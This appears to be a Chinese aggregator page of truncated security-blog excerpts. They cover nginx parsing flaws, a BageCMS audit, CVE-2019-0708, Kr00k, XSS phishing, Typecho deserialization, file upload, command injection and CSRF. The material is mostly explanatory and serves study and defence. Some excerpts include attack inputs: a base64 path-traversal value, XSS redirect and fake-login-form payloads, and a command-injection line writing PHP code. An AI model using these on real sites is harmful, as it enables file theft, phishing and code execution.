漏洞

nginx解析漏洞简介

回眸只為那壹抹淺笑 提交于 2020-03-06 11:55:19
一、漏洞描述 该漏洞与nginx、php版本无关,属于用户配置不当造成的解析漏洞 二、漏洞原理 1、 由于nginx.conf的如下配置导致nginx把以’.php’结尾的文件交给fastcgi处理,为此可以构造http://ip/uploadfiles/test.png/.php (url结尾不一定是‘.php’,任何服务器端不存在的php文件均可,比如’a.php’),其中test.png是我们上传的包含PHP代码的图片文件。 2、但是fastcgi在处理’.php’文件时发现文件并不存在,这时php.ini配置文件中cgi.fix_pathinfo=1 发挥作用,这项配置用于修复路径,如果当前路径不存在则采用上层路径。为此这里交由fastcgi处理的文件就变成了’/test.png’。 3、 最重要的一点是php-fpm.conf中的security.limit_extensions配置项限制了fastcgi解析文件的类型(即指定什么类型的文件当做代码解析),此项设置为空的时候才允许fastcgi将’.png’等文件当做代码解析。 注:限制fpm允许解析的脚本扩展名。此设置可以预防web服务器配置的错误。应当限制fpm仅仅解析.php扩展名,阻止恶意用户使用其他扩展名运行php代码。默认值:.php 三、漏洞环境搭建和复现 1、 使用docker搭建漏洞环境 2、

Bagecms v3.1.3代码审计

家住魔仙堡 提交于 2020-03-06 02:16:56
Bagecms v3.1.3代码审计 https://www.cnvd.org.cn/flaw/flawListByManu/72619 BageCM v3.1.3存在任意文件读取漏洞 BageCms in***.php文件存在SQL注入漏洞 BageCms v3.1.0后台模板功能处存在代码执行漏洞 1,任意文件读取漏洞 漏洞点:protected\modules\admini\controllers\TemplateController.php 如下actionUpdateTpl函数调用了file_get_contents对传入的filename文件名的文件内容进行读取,如下filename参数在传入file_get_contents函数之前调用CHtml::encode方法进行了处理。 跟进CHtml::encode方法:framework/yiilist.php 发现encode函数进行的只是html实体化的处理,所以并不能限制我们进行文件读取操作。 漏洞利用: 首先对需要读取的文件路径进行base64编码: ../../../index.php base64编码后 Li4vLi4vLi4vaW5kZXgucGhw 然后将其带入filename即可成功读取该文件的内容: http://192.168.110.152/bagecms3.1.3/index.php?r

【漏洞预警】CVE-2019-0708 | Windows远程桌面服务远程执行代码漏洞

夙愿已清 提交于 2020-03-05 12:45:46
发布时间: 2019-05-14 来源 当未经身份验证的攻击者使用 RDP 连接到目标系统并发送经特殊设计的请求时,远程桌面服务(以前称为“终端服务”)中存在远程执行代码漏洞。此漏洞是预身份验证,无需用户交互。成功利用此漏洞的攻击者可以在目标系统上执行任意代码。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 若要利用此漏洞,攻击者需要通过 RDP 向目标系统远程桌面服务发送经特殊设计的请求。 此安全更新通过更正远程桌面服务处理连接请求的方式来修复此漏洞。 ---------------------------- 【漏洞预警】Windows RDP 远程代码执行高危漏洞CVE-2019-0708 2019年5月15日,微软官方发布紧急安全补丁,修复了一个Windows远程桌面服务的远程代码执行漏洞CVE-2019-0708,利用此漏洞可能可以直接获取Windows服务器权限。 漏洞描述 微软官方紧急发布安全补丁,修复了一个Windows远程桌面服务的远程代码执行漏洞CVE-2019-0708,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证,无需用户交互。当未经身份验证的攻击者使用RDP(常见端口3389)连接到目标系统并发送特制请求时,可以在目标系统上执行任意命令。甚至传播恶意蠕虫,感染内网其他机器

请立即更新你的手机、电脑、路由器!最新WiFi加密漏洞披露,超十亿台设备受影响

杀马特。学长 韩版系。学妹 提交于 2020-03-05 10:55:56
在近日于旧金山举行的RSA 2020安全会议上,来自斯洛伐克防病毒公司ESET的安全研究人员公布了有关影响WiFi通信的新漏洞的详细信息。该漏洞存在于Broadcom和Cypress制造的Wi-Fi芯片中,这些芯片存在于超过十亿的设备,包括智能手机,平板电脑,笔记本电脑,路由器和IoT小工具。 该漏洞被称为“ Kr00k”,被标识为CVE-2019-15126,该漏洞可能使附近的远程攻击者拦截和解密易受攻击的设备,通过无线传输捕获无线的网络数据包。 通常,这些数据包使用取决于用户的WiFi密码的唯一密钥进行加密。但是,ESET研究人员说,对于Broadcom和Cypress Wi-Fi芯片,在称为“解除关联”的过程中,此密钥将重置为全零值。 在称为“取消关联”的过程中,此密钥将重置为全零值 攻击者无需连接到受害者的无线网络,该漏洞对使用AES-CCMP加密的WPA2-Personal或WPA2-Enterprise协议的易受攻击的设备有效。它的确使攻击者能够捕获和解密一些无线数据包,但是无法预测它将包含哪些数据。最重要的是,该漏洞破坏了无线层的加密功能,但与TLS加密无关,后者仍然可以确保使用HTTPS的站点的网络流量的安全。 Wi-Fi接入点和路由器也受此漏洞的影响,甚至智能音箱和智能手机也受到影响。 ESET已测试并确认易受攻击的设备包括以下客户端设备: 亚马逊(Echo

xss漏洞之——钓鱼页面

半城伤御伤魂 提交于 2020-03-05 01:30:18
1.重定向钓鱼:把当前页面重定向到一个钓鱼页面,此处使用百度测试 代码: <script>document.location="http://www.baidu.com"</script> 注入后效果: 2.HTML 注入式钓鱼:使用 XSS 漏洞注入 HTML 或 JavaScript 代码到页面中 代码(页面注入一个登陆界面,通过后台接收): <html><head><title>login</title></head><body><div style="text-align:center;"><form Method="POST" Action="LPXR.php" Name="form"><br /><br />Login:<br/><input name="login" /><br />Password:<br/><input name="Password" type="password" /><br/><br/><input name="Valid" value="Ok" type="submit" /><br/></form></div></body></html> 执行效果: 3.iframe 钓鱼:通过 标签嵌入远程域的一个页面实施钓鱼,此处引入百度进行覆盖测试 代码: <!DOCTYPE html><html lang="en"><head><meta

typecho反序列化漏洞

本小妞迷上赌 提交于 2020-03-05 01:28:54
漏洞介绍 Typecho是一个简单,轻巧的博客程序。基于PHP,使用多种数据库(Mysql,PostgreSQL,SQLite)储存数据。在GPL Version 2许可证下发行,是一个开源的程序,目前使用SVN来做版本管理 漏洞形成 由于源码的以下几行存在反序列化漏洞与逻辑绕过,形成漏洞 漏洞利用 思路: 由于install.php代码验证了finish参数,请求头HTTP_HOST,post数据__typecho_config,所以我们要加上这几个参数进行绕过 1.添加install.php?finish参数 http://localhost/typecho/install.php?finish=1 2.添加Referrer数据头为本地 http://localhost 3.添加post值__typecho_config=脚本运行得到的攻击代码 代码:

文件上传漏洞(基础)

痞子三分冷 提交于 2020-03-05 01:04:05
文件上传漏洞: 介绍: 一般Web站点会有用户注册功能,而当用户登入之后大多数情况下都会存在类似 头像上传、附件上传 一类的功能,这些功能点往往存在上传验证方式不严格的安全缺陷,是在Web渗透中非常关键的突破口,只要经过仔细测试分析来 绕过上传验证机制 ,往往会造成被攻击者直接上传Web后门,进而控制整个Web业务的控制权,复杂一点的情况是结合Web Server的解析漏洞来上传后门获取权限。 原理: 由于文件上传功能实现代码没有严格限制用户上传的 文件后缀以及文件类型 ,导致允许攻击者向某个可通过 Web 访问的目录上传任意PHP文件,并能够将这些文件传递给 PHP 解释器,就可以在远程服务器上执行任意PHP脚本。 成功攻击条件: 1.可以上传任意脚本文件,且上传的文件能够 被Web服务器解析执行 ,具体来说就是存放上传文件的目录要有执行脚本的权限。 2.用户能够通过Web 访问这个文件 。如果文件上传后,不能通过Web访问,那么也不能成功实施攻击。 3.知道文件上传到服务器后的 存放路径和文件名称 ,因为许多Web应用都会修改上传文件的文件名称,那么这时就需要结合其他漏洞去获取到这些信息。如果不知道上传文件的存放路径和文件名称,即使你上传了也无法访问。 基本概念: >shell与webshell: 1)SHELL:对服务器的某种操作权限 2)WEBSHELL:以ASP、PHP

命令执行漏洞

最后都变了- 提交于 2020-03-04 22:45:50
漏洞分类 1.web代码层命令执行 exec(“whoami”); 2.第三方组件命令执行漏洞 WordPress中用来处理图片的ImageMagick组件 JAVA中的命令注入漏洞(struts2/ElasticsearchGroovy等) vBulletin 5.x 版本通杀远程代码执行 3.系统层面命令执行漏洞 MS08-067 bash破壳漏洞 漏洞原理 日常的网络访问中,我们常常可以看到某些Web网站具有执行系统命令的功能,比如:有些网站提供ping功能,我们可以输入一个IP地址,它就会帮我们去尝试ping目标的IP地址,而我们则可以看到执行结果。 但是如果用户没有遵循网站的本意,而去输入精心构造的指令,可能会对网站本身的功能逻辑产生逆转,导致让目标网站执行恶意命令。 漏洞产生条件 用户可以控制输入的内容 用户输入的内容被当作命令执行 漏洞注入时权限问题 命令注入漏洞的危害跟web中间件运行的权限有关。由于web应用运行在web中间件上,所以web应用会“继承”web中间件的运行权限。如果存在命令注入漏洞的web应用运行在以系统管理员身份运行的web中间件上,那么通过web执行命令就相当于以管理员权限执行命令。 漏洞复现 同时执行多条命令,在正常命令后再连接一个其他命令,此处以dwva三种级别为例 低: www.baidu.com && echo “<?php

文件上传漏洞之——二次渲染逻辑性漏洞绕过

∥☆過路亽.° 提交于 2020-03-04 20:07:14
漏洞形成 二次渲染的缘分逻辑存在漏洞,先将文件上传,之后再判断,符合就保存,不符合删除,可利用条件竞争来进行爆破上传 复现 1.上传一个图片马,抓包,访问图片马,抓包,发送到inturde添加?a=1爆破点 2.运行一万次,可看到有部分访问成功 来源: CSDN 作者: 卖N孩的X火柴 链接: https://blog.csdn.net/wsnbbz/article/details/104651527

CSRF漏洞之——漏洞复现

核能气质少年 提交于 2020-03-04 17:22:59
介绍 CSRF(Cross Site Request Forgery, 跨站请求伪造)是一种网络的攻击方式,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF CSRF漏洞是因为web应用程序在用户进行敏感操作时,如修改账号密码、添加账号、转账等,没有校验表单token或者http请求头中的referer值,从而导致恶意攻击者利用普通用户的身份(cookie)完成攻击行为 原理 用户访问a网址,在a网址的cookie有效期内,又访问了b网址,b网站里含有对a网址进行恶意请求的代码,由于此时a网址的cookie没有过期,所以对不会对这个恶意请求进行过滤 一次CSRF攻击的过程中,受害者需要依次完成两个步骤 1.登录受信任网站A,并在本地生成Cookie 2.在A的cookie存活期内,访问危险网站B CSRF高危触发点 论坛交流、用户中心、反馈留言、交易管理、后台管理 漏洞出现在论坛交流,或者是个人用户中心和反馈留言这些常规的功能处,会造成隐私的泄露; 漏洞发生在交易管理功能的页面,此时可以进行一些类似转账或者是购买物品的操作,那么用户的资产便会存在安全隐患; 漏洞发生在后台管理的功能处,则会威胁到网站本身的安全性。 漏洞危害 CSRF漏洞会导致受害人在不知情的情况下向论坛发帖子、订阅邮件列表、网购或股票交易